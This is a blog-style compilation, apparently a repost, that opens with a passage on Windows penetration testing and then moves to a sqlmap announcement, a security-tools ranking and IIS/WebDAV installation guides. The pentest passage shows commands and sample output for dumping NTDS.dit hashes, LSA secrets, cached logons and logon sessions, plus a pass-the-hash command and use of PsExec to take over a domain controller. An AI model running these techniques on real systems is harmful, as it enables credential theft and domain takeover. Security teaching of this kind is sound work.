Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.

$ ls -1 /tmp/ntds.dit.export/
datatable.3
hiddentable.4
link_table.5
[…]

Use NTDSXtract to parse the datatable and extract users’ information, including password hashes and history:

~/NTDSXtract 1.0$ python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.5 –passwordhashes <SYSTEM file> –passwordhistory <SYSTEM file> –certificates –supplcreds <SYSTEM file> –membership > /tmp/ntds.dit.output

Use this small script that I have put together to process the output of NTDSXtract‘s dsusers.py into a “pwdump-alike” penetration tester’s friendly format:

$ python ntdstopwdump.py /tmp/ntds.dit.output
Administrator:500:NO PASSWORD*********************:09b1708f0ea4832b6d87b0ce07d7764b:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::

Phần 3: lưu và rò vết Mật khẩu

Password history
In the previous two posts of this series, I discussed how to dump Windows local users’ password hashes (SAM) and Windows domain users’ password hashes from domain controllers (ntds.dit).
When the password policy setting is configured to enforce password history, Windows stores a certain number of used passwords before an old password can be reused. The following screenshot shows you where this policy can be set.

Local Security Policy (secpol.msc) / Account Policies / Password Policy / Enforce password history

By default on workstations, this value is set to 0 and on domain controllers it is set to 24. This means that when dumping domain users’ hashes from active directory’s ntds.dit file, there are high chances to dump also the password history allowing you, during the password cracking phase, to recognise patterns used by the target users.
Despite not being current password hashes, pattern identification can lead to further attacks. For instance, ease of guessing passwords used against standalone services at later stages of your post-exploitation. Therefore, never underestimate the added value provided by dumping and cracking the password history.
Many of the tools introduced so far can dump the password history: Cain & Abel, PWDumpX along others. pwhist from Toolcrypt is also a valid option.
LSA secrets
LSA secrets is an area in the registry where Windows stores important information. This includes:

  • Account passwords for services that are set to run by operating system users as opposed to Local System, Network Service and Local Service.
  • Password used to logon to Windows if auto-logon is enabled or, generally, the password of the user logged to the console (DefaultPassword entry).

LSA secrets are stored in registry hive HKEY_LOCAL_MACHINE/Security/Policy/Secrets. Each secret has its own key. The parent key, HKEY_LOCAL_MACHINE/Security/Policy, contains the data necessary for accessing and decoding the secrets.
Dump LSA secrets
As per SAM hashes, the LSA secrets can be accessed by DLL injection into the lsass.exe process or from the registry files.
If you are Administrator and the target system is used in production, I recommend you to choose the safe path and copy off the system the registry files: SYSTEM and SECURITY: you can use the legacy registry hive copy (reg.exe/regedit.exe) or the volume shadow copies technique illustrated in the first post. Cain & Abel can extract LSA secrets from these files.
Alternatively, there are numerous tools that can be used to dump LSA secrets by injecting into lsass.exe process: gsecdump has proved to be the most reliable for LSA secrets, working across all Windows versions and architectures. On 32-bit architecture, the original lsadump2 has proved to be good too. Despite my expectations, the two NirSoft tools (LSASecretsDump and LSASecretsView) have failed to dump services’ account passwords, regardless of the architecture.
Regardless of the technique used, the passwords extracted are UTF-16 encoded. This means that they are in clear-text as opposed to SAM hashes. You can read a detailed description of the LSA secrets format here by Brendan Dolan-Gavitt.
The following screen-shot shows the output of gsecdump on a Windows Server 2003 machine running IBM DB2 and PostgreSQL. Both database management systems run as Windows local users:

Output of gsecdump.exe -l to dump LSA secrets

Threats posed by LSA secrets

Now, imagine that you have compromised a server part of a Windows domain, you have got a shell as Local System. If you want to extend your control over the network perimeter, one of the viable ways is to verify if any service runs as real operating system users and, if so, extract their clear-text password from LSA secrets.
You can run services.msc from Start / Run and sort the entries by Log On As column to check this quickly. The following screen-shot demonstrates this:

Services running as local users on Windows

Obviously, the built-in sc.exe command can do the same as well as other less known tools.
It is common to identify enterprise software like Veritas Netbackup, Microsoft SQL Server, Microsoft Exchange and others running as real users. More dangerously, sometimes system administrators opt to run services as domain users, if not domain administrators.
This is clearly wrong and poses a high threat to overall security of the target Windows domain because, as an attacker, you can dump the LSA secrets and use the clear-text domain administrator password to login to the root domain controller and takeover the Windows network.

Cached domain logon information
Windows machines can be standalone workstations or part of a Windows domain in the role server or workstation.
When a user logs onto a workstation part of a domain, technically he can either log as a local user or a domain user given that he has the credentials.
When logging as a domain user, three information are required: username, password and domain name. The latter is usually provided as a drop-down menu listing all domains that the system is part of.
Given this information, when the domain user logs onto the system, the provided password is hashed and checked over the network against the domain controller’s valid password hash (physically stored within ntds.dit file). This process is handled once again by the lsass.exe process.
LSASS first checks if the domain controller is available. If so, it proceeds with the password hash matching step and, depending on the result, it allows or denies access to the system to the authenticating domain user.
In the event that none of the domain controllers are available, the legitimate domain user would not be able to login onto the system. To avoid this from happening, Microsoft has long ago introduced the cached domain logon information mechanism in Windows.
Definition from Microsoft:

All previous users’ logon information is cached locally so that, in the event that a domain controller is unavailable during subsequent logon attempts, they are able to log on […]

Therefore, when the domain controllers are not available, the domain user can still log onto the domain machine. The only caveats being that he has previously successfully logged and that the system is configured to cache the domain logon information. The following screenshot shows you where this policy is set.

Local Security Policy (secpol.msc) / Local Policies / Security Options / Interactive logon: Number of previous logons to cache (in case domain controller is not available)

You can also read the value of this policy in registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount.
By default Windows XP and above are configured to cache 10 or more domain logon information.
Cached domain logon information is stored in registry hives HKEY_LOCAL_MACHINE/Security/CACHE/NL$X with X being a number. These registry hives are accessible by Local System and tools exist to dump them.
Dump cached domain logon information
Like other hashes, these hashes can be accessed by DLL injection into the lsass.exe process or from the registry files.
For offline dump, copy off the system the registry files SYSTEM and SECURITY: you can use the legacy registry hive copy (reg.exe/regedit.exe) or the volume shadow copies technique illustrated in the first post. Cain & Abel, creddump by Brendan Dolan-Gavitt and Windows Password Recovery by passcape can extract cached domain logon information from these files.
Alternatively, there are numerous tools that can dump this by DLL injection into lsass.exe process. On 32-bit architecture you can use the original cachedump by Arnaud Pilon which proved to be reliable also on recent Windows versions, fgdump or PWDumpX.
Unfortunately though, none of the standalone free tools work on 64-bit architecture. In this case, you can rely on Metasploit Framework own post-exploitation module if you have got a Meterpreter shell onto the target system.
Follows the output of cachedump on a Windows system part of a domain:

C:\>cachedump.exe -v
Service not found. Installing CacheDump Service (C:\cachedump.exe -s)
CacheDump service successfully installed.
Service started.
user:2d9f0b052932ad18b87f315641921cda:lab:lab.internal
Service currently active. Stopping service…
Service successfully removed.

Threats posed by cached domain logon information
Similar scenario to LSA secrets dump: you have compromised a machine part of a Windows domain and have got a shell as Local System. There are no traces of domain users’ credentials from LSA secrets. Another step to extend your control over the domain? Check if the machine is configured to cache domain logon information as explained above. If so, dump them.
Cached domain logon information cannot be directly used to authenticate to other systems as opposed to NT and LM password hashes. Nevertheless, you can crack them and use the clear-text password to authenticate to machines part of the relevant domain. I will cover password hashes cracking in depth in another blog post.
Conceptually, caching domain logon information is effective and solves network administrators’ headaches to deal with domain users logons when the domain controllers are under maintenance or unavailable for whatever reason. Although, looking at it with the security lens, it clearly poses a security threat.

 

Phần 5: Phiên đăng nhập

Logon sessions
Windows stores in memory information about every current and past successful logon. These are called logon session. This information includes the username, the domain or workgroup name and both the LM and NT password hashes.
Every time a legitimate user logs onto a Windows system, the Local Security Authority (LSA) stores in memory this information. This happens regardless of the logon type: interactive logon to the console or remote logon via Remote Desktop Protocol (RDP).
The image below from Hernan Ochoa illustrates this concept:

Windows NT logon and authentication model

The same information is stored for RunAs processes and services running as specific users. In the latter case, the clear-text password is stored in memory and can be retrieved in LSA secrets anyway.
Exception being network logons, for instance over SMB or HTTP; these do not get stored because the NT/LM hashes never actually reach the server. A challenge-response mechanism is used for authentication.
This sensible information is kept in memory because it is used for Single Sign-On (SSO) purposes.
SSO technology is extensively used in Windows network, particularly within domains. This allows, for instance, a user logged into a certain system of the domain to access remote shares, shared resources like printers and HTTP proxy protected by NTLM authentication without the need to type in his clear-text credentials each time: Windows deals with the authentication for him transparently over the network by providing exactly what is stored in memory: username, domain/workgroup and password hashes.
This authentication mechanism works because nowadays nearly all Windows services accept authentication with NT/LM hashes as an alternative to clear-text password. Exception being Remote Desktop Protocol.
Dump logon sessions
Logon sessions can be dumped given you have an administrative shell onto the target. There exist two techniques to dump logon sessions: code injection into lsass.exe process and reading of LSASS memory.
There are several tools that can dump logon sessions: msvctl from TrueSec is a safe choices for Windows XP/2003 and is limited to 32-bit architecture. The updated version of gsecdump can dump logon sessions regardless of Windows version and architecture too. More recent tools include another nice piece of code from TrueSec, lslsass: this tool has been designed specifically for Windows Vista onwards and delivers reliable results regardless of the architecture.
The most well known tools to manipulate Windows logon sessions are Windows Credentials Editor (WCE) and its predecessor, Pass-The-Hash Toolkit (PTK). Both are the result of thriving research by Hernan Ochoa, currently the founder of Amplia Security. His presentations include:

  • Pass-The-Hash Toolkit for Windows: Implementation & use presented at Hack In The Box Security Conference in Malaysia on late 2008. Despite being a dated presentation, it offers insight on the history and techniques used in post-exploitation scenarios, specifically focusing on the more generic Pass-the-Hash technique and its implementation in the Pass-The-Hash Toolkit.
  • WCE Internals presented at RootedCon in Madrid on early 2011. This presentation explains the inner workings of WCE including how Windows store credentials in memory pre and post Windows Vista.
  • Post-Exploitation with WCE presented on July 2011. Simple and effective high-level presentation with test cases. I recommend you reading this presentation before anything else if you are totally unfamiliar with logon sessions and pass-the-hash technique. Another good read is the tool’s FAQ page.

Between these two tools, I prefer WCE for a number of reasons: it is one single executable, it is safer than all the other tools as it is the only one to implement the reading of LSASS memory technique as an alternative to performing code injection and it works across all Windows versions and on both architectures.

For the purpose of this post, I have set a Windows Server 2003 R2 Service Pack 2 fully patched machine (NetBIOS name: w2k3r2) in the following state:

  • Local Administrator with a 15-characters long password logged interactively to the console.
  • Two local users, inquis and foobar, both connected over RDP, respectively using mstsc, the default RDP client on Windows, and rdesktop, a RDP client for Unix/Linux.
  • A few services, all related to IBM DB2 database management system, running as local administrator, db2admin.

lslsass was deliberately excluded from my tests as it only works on Windows Vista onwards.

All the tested tools were able dump the logon sessions successfully. Follows the output of Windows Credentials Editor:

C:\>wce.exe -l

WCE v1.2 (Windows Credentials Editor) – (c) 2010,2011 Amplia Security – by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Administrator:W2K3R2:00000000000000000000000000000000:237599E85CF684A6785A12ACD2E24E5C
inquis:W2K3R2:0AC9A586623764E16591BB5472A3AD4A:89F411F435A93044E2E8AA4CEDFE0FBA
foobar:W2K3R2:87DCEB9223BE0E08FD8E74C8CEB3053A:33D807D89B36ACDF2FAB42A361DE0B91
db2admin:W2K3R2:3AE6CCCE2A2A253F93E28745B8BF4BA6:35CCBA9168B1D5CA6093B4B7D56C619B

W2K3R2$:WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

As you can see, these tools dump logon sessions and display the username, domain/workgroup name and LM/NT hashes very similarly to SAM hashes dump tools output. The main difference is that these tools display the domain/workgroup name as domain users can be logged onto the system too as opposed to the user ID field shown by pwdump-alike tools.
The following screen-shot demonstrates the successful dump too:

Dump of logon sessions with Windows Credentials Editor (WCE) on a Windows Server 2003 R2 machine where the Administrator is logged to the console, two users are logged remotely via RDP and one service is running as local user

I realized during my tests that regardless of the method used to close a session, the logon sessions remain in memory. Take RDP connections, either if you disconnect (clicking on the top right X button of your RDP client) or log off from the Start menu, they remain in memory. I have seen this happening on Windows Server 2008 R2 Enterprise Service Pack 1 too. The main difference being that on Windows Vista onwards the logon sessions are erased from memory a few minutes after the user has logged off.

The following screen-shots demonstrate the described behaviour:

Dump of logon sessions following a disconnect via RDP of one user, foobar – his logon session remains in memory

Dump of logon sessions following a forced log off of user’s foobar RDP connection – his logon session remains in memory

db2admin logon session also remains in memory despite the relevant services are stopped.

Threats posed by logon sessions

The scenario here is similar to LSA secrets dump and cached domain logon information: you are Local System on a machine part of one or more Windows domains and you want to takeover the domains. There are no traces of domain users’ credentials from LSA secrets and the machine does not cache domain logon information.

To extend your control over the domain you can dump the logon sessions. If there is a logon session of a domain administrator, it is game over: impersonate that logon session to spawn a command prompt. This technique is also known as pass-the-hash or logon session stealing.

The command line would look like:

C:\>wce.exe -s <user>:<domain>:<LM hash>:<NT hash> -c cmd.exe

In the new command prompt window, connect over SMB, for instance with Sysinternals’ PsExec, to the root domain controller to takeover the Windows domain – Windows will use the impersonated NTLM credentials to authenticate against the domain controller and access will likely be granted as you are now, as a matter of facts, the domain administrator.

Alternatively, if there are no domain administrators’ logon sessions, you can still spray the dumped logon sessions’ hashes to others machines of the domain exactly the same way you do to verify password reuse across machines with the local users’ password hashes: in the event that you have dumped domain users’ logon sessions, chances are high that these users are allowed to login to others systems of the network therefore you have an easy way into these.

These systems might be vulnerable to others threats that allow you to takeover the domain from there, so it is definitely worth a try.

 

Phần 6: Xác thực qua lớp mạng:

Network services authentication credentials
Like LSA secrets, Windows stores passwords in a reversible format elsewhere.
When you login to a network resource like a network share, a proxy server behind NTLM authentication, a database management system, a mail server, etc, you can often instruct your client to save the password, typically by simply ticking the box “Remember my password”.
Behind the scenes, Windows stores this information in the Credential Manager – a single sign-on (SSO) solution that exists since Windows XP. These stored credentials are used to authenticate each time the corresponding network resource is accessed by the user without the need to retype the password.
These passwords are encrypted using the DPAPI syubsystem and can be dumped in clear-text format.
You can also view, edit and add to this password storage. On Windows Vista onwards the Credential Manager is available under Control Panel\User Accounts and Family Safety\Credential Manager or from Control Panel\User Accounts and Family Safety\User Accounts\\Manage your credentials.
Another storage used by Windows for a similar purpose is the Protected Storage. Applications like Internet Explorer and Outlook Express store the email account password in this storage, where they do not opt to store in the Credential Manager. The passwords stored in the Protected Storage are encrypted using the CryptoAPI functions and the key is derived from the user’s password therefore they can be dumped in clear-text format too.

Third-party software like Chrome, RealVNC Client, Thunderbird and others store passwords to websites in their own format. Some tools store them within the registry, some use the Windows API and store them in the Credential Manager or the Protected Storage and others in files. Regardless, all these credentials are stored in a reversible format, publicly documented or not, they can be dumped in clear-text like Credential Manager and Protected Storage passwords.

Dump Credential Manager
The methods to interact with the Credential Manager is documented by Microsoft and implemented in a number of tools able to dump these credentials.
NirSoft’s Network Password Recovery (netpass) is my first choice. It is one-executable only tool and reliable. Make sure you run the 64-bit version on 64-bit architecture.
Cain & Abel can also dump the Credential Manager efficiently, however it only works locally not remotely so you should better avoid it unless installing new software is permitted onto the target machine.
Passcape’s Network Password Recovery, not to be confused with the namesake tool from NirSoft, also works well, but the trial version only displays the first three characters of the dumped passwords.
Avoid Metasploit own post-exploitation module windows/gather/credentials/enum_cred_store – it has always crashed regardless of the target Windows version.
Dump Protected Storage
NirSoft’s Protected Storage PassView (pspv) is my first choice. It is one-executable only tool and reliable.
Another tool to consider is carrot, a bundle of other tools (primarily from NirSoft), good to dump Protected Storage credentials.
Avoid fgdump as it fails to dump the protected storage.

Dump third-party software stored credentials

NirSoft has a vast collection of tools to dump third-party software stored credentials. Many of these are bundled in one-executable only tool, carrot.

If you have got a Meterpreter shell onto the target system, Metasploit is handy to dump third-party software stored credentials as it has numerous post-exploitation modules for this purpose. Some are pretty much reliable, others are in beta and often crash.

Threats posed by network services authentication credentials
During an internal infrastructure assessment it is likely that you are able to own a workstation before a server.
When this occurs, collecting information about what is the role of the machine within the infrastructure is a crucial step to successfully compromise the overall network. In cases where the machine is an employee’s workstation used daily, chances are very high that he uses it to access his corporate email, internal web sites, corporate proxy and other services. If so, chances are even higher that the user has ticked the “Remember my password” entry, everywhere.
Having access, even as a low-privileged user, to these corporate systems “for free” is priceless and useful in your run to extend your control over the network and demonstrate to the customer how even the average and most insignificant workstation far from the DMZ need to be taken care of systematically.
Often corporate email credentials, network shares passwords and others are reused by users across different services if not the domain user account too so being able to dump the credentials in clear is high value during a penetration test.

 

Phần 7: Nhận được dữ liệu trên DNS trong SQL

We have recently implemented data retrieval over DNS in sqlmap. This data exfiltration technique adds up to the six existing techniques already implemented: boolean-based blind, time-based blind, full UNION, partial UNION, error-based and stacked (nested) queries. It is supported on Oracle (running either on UNIX/Linux or Windows) and Microsoft SQL Server/MySQL/PostgreSQL (running on Windows).
The technique can be tested for and used by providing sqlmap with the –dns-domain switch following a hostname that resolves over the Internet to the machine where you are running sqlmap from – you do not need to run your name server daemon so you can use a freely available DynDNS or similar solutions: sqlmap starts a fake DNS server on 53/udp so you need to run it with uid=0 privileges and handles the DNS requests from the target DBMS (actually from the DMZ’s DNS server misconfigured to resolve Internet hostnames) automatically.
In cases where the target parameter is vulnerable and exploitable by either of the blind techniques or both of them, then sqlmap will test for DNS exfiltration too and prefer it over the blind techniques as it is much faster. Needless to say that both error-based and UNION based techniques are preferred if identified exploitable.
The paper and slide-deck presented recently at PHDays conference in Moscow, Russia are available on my fellow sqlmap developer’s Slideshare page:

I recommend you all run always sqlmap latest development version from its Subversion repository:

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devcd sqlmap-devpython sqlmap.py –h

Phần 8: 125 Công cụ bảo vệ hệ thống máy tính:

The top 125 computer security tools

The security community has spoken! About 3,000 people have rated the best and most widely used computer security tools. The Nmap project has collected the results of their survey in a relaunched version of their SecTools.org project: Top 125 Network Security Tools.

sqlmap has made it to place #30 overall: a great result considering that it is a two-developers only project driven by passion, developed in our own spare time and with a large community of supporters, testers and enthusiasts.

The previous SecTools.org survey was dated 2006, when sqlmap project was just started and unknown to the most. In five years the tool has evolved from a few hundred of lines of code to a massive python tool, versatile and powerful. The security community has acknowledged this: it is the only tool in the list to combine SQL injection detection, data analysis and database takeover capabilities against numerous database management systems despite a lot of others similar tool have been developed throughout the years.

I found particularly interesting that many people highly rated web proxies in the web scanners category: 3 of the top 5 tools are web proxies. I read it as a positive sign: it means to me that manual testing is the preferred way by many to perform web application assessments as opposed to fully automated web scanners that, for the sake of clarity, can not cover business logic flaws by their design nature, hardly identify session management issues and struggle with multiple user levels’ access control list enforcement verification.

The #1 tool in the category is Burp Suite, a tool that I use on many web application and web service penetration testing engagements. A tool that eases and assists me in the process of carefully and manually assessing the security of web applications. Congratulations to Dafydd Stuttard for his great work!

sqlmap scored 6th place in this category, ahead of several commercial web scanners backed by big companies and developed by dozen of people. People could argue that this is because sqlmap is free so more people have access to it, fair point. I like to think that it scored high also because it addresses one single web application vulnerability type, the most critical, and does it damn well in the right hands. On top, we have added a lot of features, takeover functionalities, coverage for many database management systems and several optimizations.

Out of 11 tools in the sploits category, sqlmap was rated 4th: another great result in my opinion. Like Metasploit framework (#1 of the category) and w3af (#3 of the category), it is open source. It’s the only niche tool focusing on exploiting SQL injections, database design flaws and their mis-configurations against a variety of database software.

sqlmap would not be the great tool that it is today without its users’ base. I want to thank everyone that have contributed during the last five years with moral support, detailed feedback, overly appreciated patches, bug reports and acclaiming it publicly as a very handy and valuable tool.

Greetings also to the authors of renowned books for citing and reviewing sqlmap. These include the recently revamped The Web Application Hacker’s Handbook and SQL injection attacks and defense.

 

Tham khảo:

http://mdsec.net/wahh/code2e.html

Video demo: http://mdsec.net/labs/demo.html

Các bước cài: WebDav cho Windows Server 2008 R2


Introduction

Microsoft released a new WebDAV extension module that was completely rewritten for Internet Information Services (IIS) 7 on Windows Server® 2008. This new WebDAV extension module incorporated many new features that enable Web authors to publish content better than before, and offers Web administrators more security and configuration options. Microsoft has released an update to the WebDAV extension module for Windows Server® 2008 that provides shared and exclusive locks support to prevent lost updates due to overwrites.

This document walks you through adding WebDAV publishing to an existing Web site by using the new WebDAV user interface and by directly editing the IIS configuration files.

Note: This walkthrough contains a series of steps in which you log on to your Web site using the local loopback address and the local administrator account. When using an administrator account, these steps should only be followed on the server itself using the loopback address or over SSL from a remote server. If you prefer to use a separate user account instead of the administrator account, you must create the appropriate folders and set the correct permissions for that user account when necessary.

In This Walkthrough

Note: This topic discusses using the WebDAV Redirector to connect to your web site. Please see the Using the WebDAV Redirector topic for more information; specifically the Troubleshooting the WebDAV Redirector section if you have trouble using the WebDAV redirector.

Installing WebDAV on IIS 7.0

Prerequisites

The following items are required to complete the procedures in this article:

  • IIS 7.0 must be installed on your server, and the following must be configured:
    • The Default Web Site that is created by the IIS 7.0 installation must still exist.
    • The Internet Information Services Manager must be installed.
    • At least one authentication method must be installed.

Note: If you choose to use Basic Authentication with the WebDAV redirector, you must connect to your server using HTTPS.

  • The WebDAV Redirector must be installed:
    • You must use Server Manager to install the Desktop Experience feature before you can use the WebDAV redirector.
Downloading the Right Version for Your Server

There are two separate downloadable packages for the new WebDAV extension module; you need to download the appropriate package for your version of Windows Server 2008:

Launching the Installation Package

You must run the installation package as an administrator. This can be accomplished by one of the following methods:

  • Logging in to your server using the actual account named “Administrator”, then browsing to the download pages listed above or double-clicking the download package if you have saved it to your server.
  • Logging on using an account with administrator privileges and opening a command-prompt by right-clicking the Command Prompt menu item that is located in the Accessories menu for Windows programs and selecting “Run as administrator”, then typing the appropriate command listed below for your version of Windows to run the installation:
    • 32-bit Windows Versions:
      • msiexec /i webdav_x86_75.msi
    • 64-bit Windows Versions:
      • msiexec /i webdav_x64_75.msi
Walking Through the Installation Process
  1. When the installation package opens, you see the following screen. If you agree to the license terms, check the “I accept” box, then click Install.
  2. The progress indicator will reflect the status of the installation as it proceeds.
  3. After the installation has completed, click Finish.
  4. The WebDAV extension module is now installed.

Installing WebDAV on IIS 7.5

IIS 7.5 for Windows Server 2008 R2
  1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
  2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
  3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
  4. On the Select Role Services page of the Add Role Services Wizard, expand Common HTTP Features, select WebDAV Publishing, and then click Next.

  5. On the Confirm Installation Selections page, click Install.
  6. On the Results page, click Close.
IIS 7.5 for Windows 7
  1. On the taskbar, click Start, and then click Control Panel.
  2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
  3. Expand Internet Information Services, then World Wide Web Services, then Common HTTP Features.
  4. Select WebDAV Publishing, and then click OK.

Enabling WebDAV Publishing by Using IIS Manager

The new WebDAV extension module makes it easy to add WebDAV publishing to existing sites by providing you with a wizard that walks you through all of the required steps.

Step 1: Enabling WebDAV and Adding an Authoring Rule

In this first step, we add WebDAV publishing to the Default Web site, and add the required settings to allow the local administrator account to edit the content.

  1. In IIS Manager, in the Connections pane, expand the Sites node in the tree, then click the Default Web Site.
  2. As shown in the image below, double-click the WebDAV Authoring Rules feature.
  3. When the WebDAV Authoring Rules page is displayed, click the Enable WebDAV task in the Actions page.
  4. Once WebDAV has been enabled, click the Add Authoring Rule task in the Actions pane.
  5. When the Add Authoring Rule dialog appears:
    1. Click All content to specify that the rule applies to all content types.
    2. Choose “Specified users” and type “administrator” for the user name.
    3. Select Read, Source, and Write for the permissions.
    4. When you have completed these items, click OK.

Summary

Task completed. You have enabled WebDAV authoring on an existing Web site.

To recap the items that you completed in this step, we added WebDAV publishing to the “Default Web Site” by:

  • Enabling WebDAV for the Web site.
  • Adding an Authoring Rule for the local administrator account for Read, Source, and Write access.

Note: As mentioned earlier, your default request filtering settings may block several file types from WebDAV authoring. If you do not modify your request filtering settings, you may see various errors when you try to publish files that are blocked. For example, if you attempt to upload or download a web.config file you will see errors in your WebDAV client. For more information about configuring your request filtering settings, see the How to Configure WebDAV with Request Filtering walkthrough.

Step 2: Logging in to Your WebDAV Site

In Step 1 above, you enabled WebDAV publishing for your Default Web Site and added an Authoring Rule for the local administrator account for Read, Source, and Write access to your Web site’s content. In this step, you log in using your administrator account.

Ensuring that you have Authorization and Authentication configured

  1. In IIS Manager, in the Connections pane, expand the Sites node in the tree, then click the Default Web Site.
  2. Double-click the Authentication feature.
  3. When the Authentication feature opens, make sure that Windows Authentication is enabled. (Note: You can use Basic Authentication with WebDAV, but the WebDAV redirector will only use Basic authentication with SSL connections.)
  4. In IIS Manager, click the Default Web Site under the Sites node in the tree.
  5. Double-click the Authorization feature.
  6. When the Authorization feature opens, make sure that an Allow rule is defined that includes the administrator account. (For example, the default rule for IIS allowing access to All Users will include the administrator account.)

Logging in to your WebDAV site using your administrator account

  1. On your WebDAV server, open a command prompt session.
  2. Type the following command to connect to your WebDAV server:
    net use * http://localhost/

You now have a drive mapped to your WebDAV-enabled web site using the local administrator account, and based on the authorization rule that we added in Step 1, you have Read, Write, and Source access to the content folder.

Summary

To recap the items that you completed in this step:

  • You verified that your Web site had sufficient Authentication and Authorization settings.
  • You logged in to your WebDAV site as the local administrator.

Enabling WebDAV Publishing by Editing the IIS Configuration Files

You can also add WebDAV publishing to an existing Web site by editing the IIS configuration files.

Note: Editing your applicationHost.config file requires full administrative permissions. This is best accomplished using one of two methods:

  • Log in to your computer using the local “administrator” account.
  • If you are logged in using an account with administrative permissions that is not the local “administrator” account, open Notepad using the “Run as Administrator” option.

Note: The above steps are required because the User Account Control (UAC) security component in Windows Server 2008 will prevent access to your applicationHost.config file. For more information about UAC, please see the following documentation:

The following steps will walk you through all of the required settings to add WebDAV publishing for the Default Web Site.

  1. Using a text editor such as Windows Notepad, open your applicationHost.config file, which is located in your %SystemRoot%\System32\inetsrv\config folder by default.
  2. Scroll to the bottom of your applicationHost.config file and locate the <location> section for your Default Web Site that contains your authentication settings. If this section does not exist, you must add it. This should resemble the following example:
    <location path=”Default Web Site”>
    <system.webServer>
    <security>
    <authentication>
    <anonymousAuthentication enabled=”true” />
    <basicAuthentication enabled=”false” />
    <digestAuthentication enabled=”false” />
    <windowsAuthentication enabled=”true” />
    </authentication>
    </security>
    </system.webServer>
    </location>
  3. Make sure that you have Windows authentication method enabled.
  4. Add a <webdav> section beneath the closing </authentication> tag that will contain your WebDAV settings.
  5. Add an <authoring enabled=”true” /> element to the <webdav> element
  6. And add and <authoringRules> collection with a single entry for <add users=”administrator” path=”*” access=”Read, Write, Source” />.
  7. Your Default Web Site’s settings should now resemble the following example:
    <location path=”Default Web Site”>
    <system.webServer>
    <security>
    <authentication>
    <windowsAuthentication enabled=”true” />
    <anonymousAuthentication enabled=”false” />
    <digestAuthentication enabled=”false” />
    <basicAuthentication enabled=”false” />
    </authentication>
    </security>
    <webdav>
    <authoring enabled=”true” />
    <authoringRules>
    <add users=”administrator” path=”*”
    access=”Read, Write, Source” />
    </authoringRules>
    </webdav>
    </system.webServer>
    </location>
  8. Save your applicationHost.config file.

You should now be able to log in to your WebDAV-enabled site using a WebDAV client using the administrator account, but no other users should be able to access the content using WebDAV.

Summary

In this task you added WebDAV publishing to your Default Web Site by editing the IIS configuration files. To recap the items that you completed in this task:

  1. You enabled Windows Authentication for the Default Web Site.
  2. You enabled WebDAV for the Default Web Site.
  3. You added a WebDAV authoring rule for the administrator account with Read, Write, and Source access the Default Web Site.

How to Install Internet Information Services (IIS 7) on Windows 7 Ultimate


internet-information-services-iis7-manager

If you want to install Microsoft Internet Information Server (IIS 7) on your new Windows 7 computer first time after working with IIS 6 for long years, I believe you will be surprised with the improvements and changes both in IIS and IIS installation process.
First of all Microsoft has renamed the IIS as Internet Information Services and is not now using Internet Information Server for IIS.
In this short guide I will summarize the steps of installing IIS 7 on Windows 7 in the way I had recently on my Windows 7 Ultimate Edition PC. I’m using this pc as a home pc but I work on my web projects at home so I run SQL Server 2008 R2 as well as IIS and host ASP.NET applications.
So if you want to install Internet Information Services (IIS 7) for a developer computer then you can follow me by reading my notes below.
I do not know the other editions but Windows 7 Proffessional edition and the Windows 7 Ultimate edition are able to install and run IIS 7.

IIS Installation

IIS 7 can be installed and features of IIS 7 can be added or removed by Windows 7 “Control Panel > Programs” management screen. You can add and install Windows 7 components and build in applications using the “Turn Windows features on or off” link.

iis 7 installation on windows 7

When the Windows Features screen opens and generates in a short time a list of Windows 7 features installed and configured on the current system and a list of Windows 7 features not installed yet.
When the list is completed drill down the Internet Information Services node.

Internet Information Services – IIS 7 World Wide Web Features

Application Development Features

I started with the World Wide Web Services and Application Development Features.
Since I’m an ASP.NET developer and aim to work with ASP.NET on IIS 7, I selected the checkbox next to ASP.NET. When you click on ASP.NET the following features will be automatically selected :
.NET Extensibility,
ISAPI Extensions and
ISAPI Filters.

iis7-application-development-features

Security

Then I opened the Security node and marked Windows Authentication beside Request Filtering.
I did not choose any other options since I do not think to develop using other authorization and authentication features in a short time.
So I keep them uninstalled. I can installed these features in future somehow.

iis-7-security-features-list

Common HTTP Features

From the Common HTTP Features, I choosed Static Content in order to serve static web pages in .htm and .html file extensions.
I did not select Directory Browsing feature to install as you will see, since directory browsing function is one of the basic ones that we remove from each web site on IIS 6 or other IIS versions.
I do not prefer to work with WebDAV now, so I keep WebDAV Publishing feature unchecked too.

installing-iis-7-common-http-features

Health and Diagnostics

From the Health and Diagnostics tools you will find new logging, monitoring and tracing tools helpful for keeping your web server secure. The Request Monitor and Tracing features will also help you to debug your applications by tracing the web request easily.

install-iis7-health-and-diagnostic-tools-and-features

Performance Features

In the IIS 7 Performance Features section there exists compression functions for static content and dynamic content. You can choose any compression feature.

installing-iis-7-performance-features

Internet Information Services – IIS 7 Web Management Tools

The IIS Management Console is a must if you are working with Internet Information Services. It is a handy web management platform which contains tools and serves methods for you to publish, manage, trace and log your web sites and web applications.
I checked the IIS Management Scripts and Tools. I believe these tools and scripts will make my life easier while working on IIS 7.
IIS Management Services is used to perform management of Internet Information Services from remote computers. If you want to perform management of your web server from remote computers, you should mark this option. Especially if you are installing IIS 7 on a web server, probably you will want to remote manage your IIS web server.

install-iis-7-web-management-tools

After you select all the necessary components, tools and features required for you click on OK button to start installing IIS 7 on Windows 7.
You will have wait for a few minutes while Windows 7 is installing IIS 7 and changing IIS 7 features.

installing-iis7-on-windows7-ultimate

After the Internet Information Services – IIS 7 installation is completed you can browse to the http://localhost in order to see if your IIS7 is installed and start running on your Windows 7 computer.
If IIS7 (Internet Information Services) is up and running the following static web page will be displayed on your browser.

iis-7-welcome-screen

